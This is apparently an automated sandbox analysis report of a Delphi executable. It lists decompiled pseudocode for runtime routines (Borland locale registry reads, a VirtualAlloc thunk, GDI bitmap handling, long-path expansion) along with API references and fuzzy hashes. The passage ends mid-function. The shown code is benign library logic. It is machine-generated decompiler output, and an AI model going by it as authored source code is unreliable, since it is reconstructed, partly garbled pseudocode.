                                                                          • Part of subcall function 00405CA0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?), ref: 00405CBC
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C), ref: 00405CF8
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
                                                                          • Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
                                                                          • Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
                                                                          • Part of subcall function 00405CA0: RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                        • String ID:
                                                                        • API String ID: 2796650324-0
                                                                        • Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                        • Instruction ID: d33aed5311a0e2fae4487a5322506e26d3b21fe1229f44e33d68ae0e5b1a5d0f
                                                                        • Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                        • Instruction Fuzzy Hash: 29E06D71A007208FDB10DEA888C1A4737D8AB08794F000A66FC58EF38AD374DD108BD4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0041D260(intOrPtr _a4, intOrPtr _a8) {
                                                                        				void* _t14;
                                                                        				void _t15;
                                                                        				intOrPtr _t25;
                                                                        				char* _t26;
                                                                        				void* _t35;
                                                                        
                                                                        				if( *0x496a20 == 0) {
                                                                        					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                                                                        					_t35 = _t14;
                                                                        					_t15 =  *0x496a1c; // 0x7c0000
                                                                        					 *_t35 = _t15;
                                                                        					_t1 = _t35 + 4; // 0x4
                                                                        					E004029BC(0x47a4bc, 2, _t1);
                                                                        					_t2 = _t35 + 5; // 0x5
                                                                        					 *((intOrPtr*)(_t35 + 6)) = E0041D258(_t2, E0041D238);
                                                                        					_t4 = _t35 + 0xa; // 0xa
                                                                        					_t26 = _t4;
                                                                        					do {
                                                                        						 *_t26 = 0xe8;
                                                                        						_t5 = _t35 + 4; // 0x4
                                                                        						 *((intOrPtr*)(_t26 + 1)) = E0041D258(_t26, _t5);
                                                                        						 *((intOrPtr*)(_t26 + 5)) =  *0x496a20;
                                                                        						 *0x496a20 = _t26;
                                                                        						_t26 = _t26 + 0xd;
                                                                        					} while (_t26 - _t35 < 0xffc);
                                                                        					 *0x496a1c = _t35;
                                                                        				}
                                                                        				_t25 =  *0x496a20;
                                                                        				 *0x496a20 =  *((intOrPtr*)(_t25 + 5));
                                                                        				 *((intOrPtr*)(_t25 + 5)) = _a4;
                                                                        				 *((intOrPtr*)(_t25 + 9)) = _a8;
                                                                        				return  *0x496a20;
                                                                        			}









                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D27E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 3c5408913deefef89f740840773542ad306855a6b70ed471a7900e0b2845a8e5
                                                                        • Instruction ID: ab322e860265238dc008cf03a3abd9f104667954c24ec927d3ccddf525789675
                                                                        • Opcode Fuzzy Hash: 3c5408913deefef89f740840773542ad306855a6b70ed471a7900e0b2845a8e5
                                                                        • Instruction Fuzzy Hash: 3A119E746003058FC710DF19C880B82FBE0EF88350F10C57BE9699B385D3B8E9018BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 72%
                                                                        			E004239F8(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
                                                                        				struct HBITMAP__* _v8;
                                                                        				struct HPALETTE__* _v12;
                                                                        				struct HPALETTE__* _v16;
                                                                        				struct HPALETTE__* _v20;
                                                                        				void* _v24;
                                                                        				struct HDC__* _v28;
                                                                        				struct HDC__* _v32;
                                                                        				struct HDC__* _v36;
                                                                        				BITMAPINFO* _v40;
                                                                        				void* _v44;
                                                                        				intOrPtr _v48;
                                                                        				struct tagRGBQUAD _v52;
                                                                        				struct HPALETTE__* _v56;
                                                                        				intOrPtr _v116;
                                                                        				intOrPtr _v120;
                                                                        				intOrPtr _v132;
                                                                        				intOrPtr _v136;
                                                                        				void _v140;
                                                                        				struct tagRECT _v156;
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				signed short _t229;
                                                                        				int _t281;
                                                                        				signed int _t290;
                                                                        				signed short _t292;
                                                                        				struct HBRUSH__* _t366;
                                                                        				struct HPALETTE__* _t422;
                                                                        				signed int _t441;
                                                                        				intOrPtr _t442;
                                                                        				intOrPtr _t444;
                                                                        				intOrPtr _t445;
                                                                        				void* _t455;
                                                                        				void* _t457;
                                                                        				void* _t459;
                                                                        				intOrPtr _t460;
                                                                        
                                                                        				_t457 = _t459;
                                                                        				_t460 = _t459 + 0xffffff68;
                                                                        				_push(_t419);
                                                                        				_v16 = __ecx;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_v20 = 0;
                                                                        				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
                                                                        					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
                                                                        						E004235B4(_v8);
                                                                        						_v116 = 0;
                                                                        						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
                                                                        							E00420A08();
                                                                        						}
                                                                        						_v28 = E00420B28(GetDC(0));
                                                                        						_v32 = E00420B28(CreateCompatibleDC(_v28));
                                                                        						_push(_t457);
                                                                        						_push(0x424046);
                                                                        						_push( *[fs:edx]);
                                                                        						 *[fs:edx] = _t460;
                                                                        						if( *(_a8 + 0x18) >= 0x28) {
                                                                        							_v40 = E00402754(0x42c);
                                                                        							_push(_t457);
                                                                        							_push(0x423d50);
                                                                        							_push( *[fs:edx]);
                                                                        							 *[fs:edx] = _t460;
                                                                        							 *(_a8 + 0x18) = 0x28;
                                                                        							 *((short*)(_a8 + 0x24)) = 1;
                                                                        							if( *(_a8 + 0x26) == 0) {
                                                                        								_t290 = GetDeviceCaps(_v28, 0xc);
                                                                        								_t292 = GetDeviceCaps(_v28, 0xe);
                                                                        								_t419 = _t290 * _t292;
                                                                        								 *(_a8 + 0x26) = _t290 * _t292;
                                                                        							}
                                                                        							_t55 = _a8 + 0x18; // 0x18
                                                                        							memcpy(_v40, _t55, 0xa << 2);
                                                                        							 *(_a8 + 4) =  *(_a8 + 0x1c);
                                                                        							_t441 = _a8;
                                                                        							 *(_t441 + 8) =  *(_a8 + 0x20);
                                                                        							if( *(_a8 + 0x26) > 8) {
                                                                        								_t229 =  *(_a8 + 0x26);
                                                                        								if(_t229 == 0x10) {
                                                                        									L30:
                                                                        									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
                                                                        										E004239AC(_a8);
                                                                        										_t441 =  &(_v40->bmiColors);
                                                                        										E004029BC(_a8 + 0x40, 0xc, _t441);
                                                                        									}
                                                                        								} else {
                                                                        									_t441 = _a8;
                                                                        									if(_t229 == 0x20) {
                                                                        										goto L30;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
                                                                        									if(_v16 == 0) {
                                                                        										if(_v8 != 0) {
                                                                        											_v24 = SelectObject(_v32, _v8);
                                                                        											if(_v116 <= 0 || _v120 == 0) {
                                                                        												asm("cdq");
                                                                        												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
                                                                        											} else {
                                                                        												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
                                                                        												_t441 = _a8;
                                                                        												 *(_t441 + 0x38) = _t281;
                                                                        											}
                                                                        											SelectObject(_v32, _v24);
                                                                        										}
                                                                        									} else {
                                                                        										_t441 =  &(_v40->bmiColors);
                                                                        										E004212BC(_v16, 0xff, _t441);
                                                                        									}
                                                                        								} else {
                                                                        									_t441 = 0;
                                                                        									_v40->bmiColors = 0;
                                                                        									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
                                                                        								}
                                                                        							}
                                                                        							_v20 = E00420B28(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
                                                                        							if(_v44 == 0) {
                                                                        								E00420A80(_t419);
                                                                        							}
                                                                        							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
                                                                        								_pop(_t442);
                                                                        								 *[fs:eax] = _t442;
                                                                        								_push(0x423d57);
                                                                        								return E00402774(_v40);
                                                                        							} else {
                                                                        								asm("cdq");
                                                                        								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
                                                                        								E00403E54();
                                                                        								E00403E54();
                                                                        								goto L61;
                                                                        							}
                                                                        						} else {
                                                                        							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
                                                                        								_v20 = E00420B28(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
                                                                        							} else {
                                                                        								_v20 = E00420B28(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
                                                                        							}
                                                                        							E00420B28(_v20);
                                                                        							_v24 = E00420B28(SelectObject(_v32, _v20));
                                                                        							_push(_t457);
                                                                        							_push(0x423ff7);
                                                                        							_push( *[fs:eax]);
                                                                        							 *[fs:eax] = _t460;
                                                                        							_push(_t457);
                                                                        							_push(0x423fe6);
                                                                        							_push( *[fs:eax]);
                                                                        							 *[fs:eax] = _t460;
                                                                        							_v56 = 0;
                                                                        							_t422 = 0;
                                                                        							if(_v16 != 0) {
                                                                        								_v56 = SelectPalette(_v32, _v16, 0);
                                                                        								RealizePalette(_v32);
                                                                        							}
                                                                        							_push(_t457);
                                                                        							_push(0x423fc4);
                                                                        							_push( *[fs:eax]);
                                                                        							 *[fs:eax] = _t460;
                                                                        							if(_a4 == 0) {
                                                                        								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
                                                                        							} else {
                                                                        								_t366 = E0041FC84( *((intOrPtr*)(_a4 + 0x14)));
                                                                        								E00412BCC( *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
                                                                        								FillRect(_v32,  &_v156, _t366);
                                                                        								SetTextColor(_v32, E0041EFA4( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                                                                        								SetBkColor(_v32, E0041EFA4(E0041FC48( *((intOrPtr*)(_a4 + 0x14)))));
                                                                        								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
                                                                        									_v52 = E0041EFA4( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
                                                                        									_v48 = E0041EFA4(E0041FC48( *((intOrPtr*)(_a4 + 0x14))));
                                                                        									SetDIBColorTable(_v32, 0, 2,  &_v52);
                                                                        								}
                                                                        							}
                                                                        							if(_v8 == 0) {
                                                                        								_pop(_t444);
                                                                        								 *[fs:eax] = _t444;
                                                                        								_push(E00423FCB);
                                                                        								if(_v16 != 0) {
                                                                        									return SelectPalette(_v32, _v56, 0xffffffff);
                                                                        								}
                                                                        								return 0;
                                                                        							} else {
                                                                        								_v36 = E00420B28(CreateCompatibleDC(_v28));
                                                                        								_push(_t457);
                                                                        								_push(0x423f9a);
                                                                        								_push( *[fs:eax]);
                                                                        								 *[fs:eax] = _t460;
                                                                        								_t455 = E00420B28(SelectObject(_v36, _v8));
                                                                        								if(_v12 != 0) {
                                                                        									_t422 = SelectPalette(_v36, _v12, 0);
                                                                        									RealizePalette(_v36);
                                                                        								}
                                                                        								if(_a4 != 0) {
                                                                        									SetTextColor(_v36, E0041EFA4( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                                                                        									SetBkColor(_v36, E0041EFA4(E0041FC48( *((intOrPtr*)(_a4 + 0x14)))));
                                                                        								}
                                                                        								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
                                                                        								if(_v12 != 0) {
                                                                        									SelectPalette(_v36, _t422, 0xffffffff);
                                                                        								}
                                                                        								E00420B28(SelectObject(_v36, _t455));
                                                                        								_pop(_t445);
                                                                        								 *[fs:eax] = _t445;
                                                                        								_push(0x423fa1);
                                                                        								return DeleteDC(_v36);
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						goto L61;
                                                                        					}
                                                                        				} else {
                                                                        					L61:
                                                                        					return _v20;
                                                                        				}
                                                                        			}






































                                                                        0x00423f88
                                                                        0x00423f8b
                                                                        0x00423f99
                                                                        0x00423f99
                                                                        0x00423ea9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042404d
                                                                        0x0042404d
                                                                        0x00424056
                                                                        0x00424056

                                                                        APIs
                                                                        • GetObjectA.GDI32(00000000,00000054,?), ref: 00423A78
                                                                        • GetDC.USER32(00000000), ref: 00423A89
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00423A9A
                                                                        • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00423AE6
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00423B0A
                                                                        • SelectObject.GDI32(00000000,?), ref: 00423D67
                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00423DA7
                                                                        • RealizePalette.GDI32(00000000), ref: 00423DB3
                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 00423E1C
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00423E36
                                                                        • SetDIBColorTable.GDI32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00423FC4,?,00000000,00423FE6), ref: 00423E7E
                                                                        • FillRect.USER32 ref: 00423E04
                                                                          • Part of subcall function 0041EFA4: GetSysColor.USER32(?), ref: 0041EFAE
                                                                        • PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 00423EA0
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00423EB3
                                                                        • SelectObject.GDI32(?,00000000), ref: 00423ED6
                                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 00423EF2
                                                                        • RealizePalette.GDI32(?), ref: 00423EFD
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00423F1B
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00423F35
                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423F5D
                                                                        • SelectPalette.GDI32(?,00000000,000000FF), ref: 00423F6F
                                                                        • SelectObject.GDI32(?,00000000), ref: 00423F79
                                                                        • DeleteDC.GDI32(?), ref: 00423F94
                                                                          • Part of subcall function 0041FC84: CreateBrushIndirect.GDI32(?), ref: 0041FD2E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                                        • String ID:
                                                                        • API String ID: 1299887459-0
                                                                        • Opcode ID: 3455c8d4d5cdb2e9cec7868919c55068e8ac0fe47da5793c35daf97f491ef063
                                                                        • Instruction ID: 6af8113a591f14ca49e0fa3a34acdbbadf62191862ecf0bc745c14bc79de69af
                                                                        • Opcode Fuzzy Hash: 3455c8d4d5cdb2e9cec7868919c55068e8ac0fe47da5793c35daf97f491ef063
                                                                        • Instruction Fuzzy Hash: 9A120B71A00218AFDB10EF99D985F9EB7F8EB08315F518456F914EB291C778EE80CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E00405AE8(char* __eax, intOrPtr __edx) {
                                                                        				char* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				struct _WIN32_FIND_DATAA _v334;
                                                                        				char _v595;
                                                                        				void* _t45;
                                                                        				char* _t54;
                                                                        				char* _t64;
                                                                        				void* _t83;
                                                                        				intOrPtr* _t84;
                                                                        				char* _t90;
                                                                        				struct HINSTANCE__* _t91;
                                                                        				char* _t93;
                                                                        				void* _t94;
                                                                        				char* _t95;
                                                                        				void* _t96;
                                                                        
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_v16 = _v8;
                                                                        				_t91 = GetModuleHandleA("kernel32.dll");
                                                                        				if(_t91 == 0) {
                                                                        					L4:
                                                                        					if( *_v8 != 0x5c) {
                                                                        						_t93 = _v8 + 2;
                                                                        						goto L10;
                                                                        					} else {
                                                                        						if( *((char*)(_v8 + 1)) == 0x5c) {
                                                                        							_t95 = E00405AD4(_v8 + 2);
                                                                        							if( *_t95 != 0) {
                                                                        								_t14 = _t95 + 1; // 0x1
                                                                        								_t93 = E00405AD4(_t14);
                                                                        								if( *_t93 != 0) {
                                                                        									L10:
                                                                        									_t83 = _t93 - _v8;
                                                                        									_push(_t83 + 1);
                                                                        									_push(_v8);
                                                                        									_push( &_v595);
                                                                        									L00401338();
                                                                        									while( *_t93 != 0) {
                                                                        										_t90 = E00405AD4(_t93 + 1);
                                                                        										_t45 = _t90 - _t93;
                                                                        										if(_t45 + _t83 + 1 <= 0x105) {
                                                                        											_push(_t45 + 1);
                                                                        											_push(_t93);
                                                                        											_push( &(( &_v595)[_t83]));
                                                                        											L00401338();
                                                                        											_t94 = FindFirstFileA( &_v595,  &_v334);
                                                                        											if(_t94 != 0xffffffff) {
                                                                        												FindClose(_t94);
                                                                        												_t54 =  &(_v334.cFileName);
                                                                        												_push(_t54);
                                                                        												L00401340();
                                                                        												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                                                        													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                                                        													_push(0x105 - _t83 - 1);
                                                                        													_push( &(_v334.cFileName));
                                                                        													_push( &(( &(( &_v595)[_t83]))[1]));
                                                                        													L00401338();
                                                                        													_t64 =  &(_v334.cFileName);
                                                                        													_push(_t64);
                                                                        													L00401340();
                                                                        													_t83 = _t83 + _t64 + 1;
                                                                        													_t93 = _t90;
                                                                        													continue;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        										goto L17;
                                                                        									}
                                                                        									_push(_v12);
                                                                        									_push( &_v595);
                                                                        									_push(_v8);
                                                                        									L00401338();
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                                                        					if(_t84 == 0) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						_push(0x105);
                                                                        						_push( &_v595);
                                                                        						_push(_v8);
                                                                        						if( *_t84() == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							_push(_v12);
                                                                        							_push( &_v595);
                                                                        							_push(_v8);
                                                                        							L00401338();
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L17:
                                                                        				return _v16;
                                                                        			}




















                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405B05
                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405B16
                                                                        • lstrcpyn.KERNEL32(?,?,?,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B46
                                                                        • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405BAA
                                                                        • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001), ref: 00405BDF
                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5), ref: 00405BF2
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000), ref: 00405BFF
                                                                        • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48), ref: 00405C0B
                                                                        • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C3F
                                                                        • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C4B
                                                                        • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C6D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                        • API String ID: 3245196872-1565342463
                                                                        • Opcode ID: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
                                                                        • Instruction ID: 73109fc7617de6927649651d2e73acf26c869defa74ee943d75a78e36df64a33
                                                                        • Opcode Fuzzy Hash: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
                                                                        • Instruction Fuzzy Hash: D441837190465CABEB10EAA8CC85EDFB7ECDF05304F1401B6B949F7291D678AE408F58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00452974(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				char _v12;
                                                                        				intOrPtr _t149;
                                                                        				intOrPtr _t154;
                                                                        				intOrPtr _t155;
                                                                        				intOrPtr _t160;
                                                                        				intOrPtr _t162;
                                                                        				intOrPtr _t163;
                                                                        				void* _t165;
                                                                        				struct HWND__* _t166;
                                                                        				long _t176;
                                                                        				signed int _t198;
                                                                        				signed int _t199;
                                                                        				long _t220;
                                                                        				intOrPtr _t226;
                                                                        				int _t231;
                                                                        				intOrPtr _t232;
                                                                        				intOrPtr _t241;
                                                                        				intOrPtr _t245;
                                                                        				signed int _t248;
                                                                        				intOrPtr _t251;
                                                                        				intOrPtr _t252;
                                                                        				signed int _t258;
                                                                        				long _t259;
                                                                        				intOrPtr _t262;
                                                                        				intOrPtr _t266;
                                                                        				signed int _t269;
                                                                        				intOrPtr _t270;
                                                                        				intOrPtr _t271;
                                                                        				signed int _t277;
                                                                        				long _t278;
                                                                        				intOrPtr _t281;
                                                                        				signed int _t286;
                                                                        				signed int _t287;
                                                                        				long _t290;
                                                                        				intOrPtr _t294;
                                                                        				struct HWND__* _t299;
                                                                        				signed int _t301;
                                                                        				signed int _t302;
                                                                        				signed int _t305;
                                                                        				signed int _t307;
                                                                        				long _t308;
                                                                        				signed int _t311;
                                                                        				signed int _t313;
                                                                        				long _t314;
                                                                        				signed int _t317;
                                                                        				signed int _t318;
                                                                        				signed int _t326;
                                                                        				long _t328;
                                                                        				intOrPtr _t331;
                                                                        				intOrPtr _t362;
                                                                        				long _t370;
                                                                        				void* _t372;
                                                                        				void* _t373;
                                                                        				intOrPtr _t374;
                                                                        
                                                                        				_t372 = _t373;
                                                                        				_t374 = _t373 + 0xfffffff8;
                                                                        				_v12 = 0;
                                                                        				_v8 = __eax;
                                                                        				_push(_t372);
                                                                        				_push(0x452ede);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t374;
                                                                        				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
                                                                        					_t294 =  *0x495c40; // 0x41d594
                                                                        					E00406548(_t294,  &_v12);
                                                                        					E0040A17C(_v12, 1);
                                                                        					E00403DA8();
                                                                        				}
                                                                        				_t149 =  *0x496c04; // 0x2170d40
                                                                        				E00456F4C(_t149);
                                                                        				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
                                                                        				_push(_t372);
                                                                        				_push(0x452ec1);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t374;
                                                                        				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                                                                        					_t155 = _v8;
                                                                        					_t378 =  *((char*)(_t155 + 0x1a6));
                                                                        					if( *((char*)(_t155 + 0x1a6)) == 0) {
                                                                        						_push(_t372);
                                                                        						_push(0x452dc8);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t374;
                                                                        						E004037D8(_v8, __eflags);
                                                                        						 *[fs:eax] = 0;
                                                                        						_t160 =  *0x496c08; // 0x217094c
                                                                        						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
                                                                        						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
                                                                        							__eflags = 0;
                                                                        							E00451B60(_v8, 0);
                                                                        						}
                                                                        						_t162 = _v8;
                                                                        						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
                                                                        						if( *((char*)(_t162 + 0x22f)) != 1) {
                                                                        							_t163 = _v8;
                                                                        							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
                                                                        							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
                                                                        								_t299 = 0;
                                                                        								_t165 = E0043CC2C(_v8);
                                                                        								_t166 = GetActiveWindow();
                                                                        								__eflags = _t165 - _t166;
                                                                        								if(_t165 == _t166) {
                                                                        									_t176 = IsIconic(E0043CC2C(_v8));
                                                                        									__eflags = _t176;
                                                                        									if(_t176 == 0) {
                                                                        										_t299 = E0044D7A0(E0043CC2C(_v8));
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t299;
                                                                        								if(_t299 == 0) {
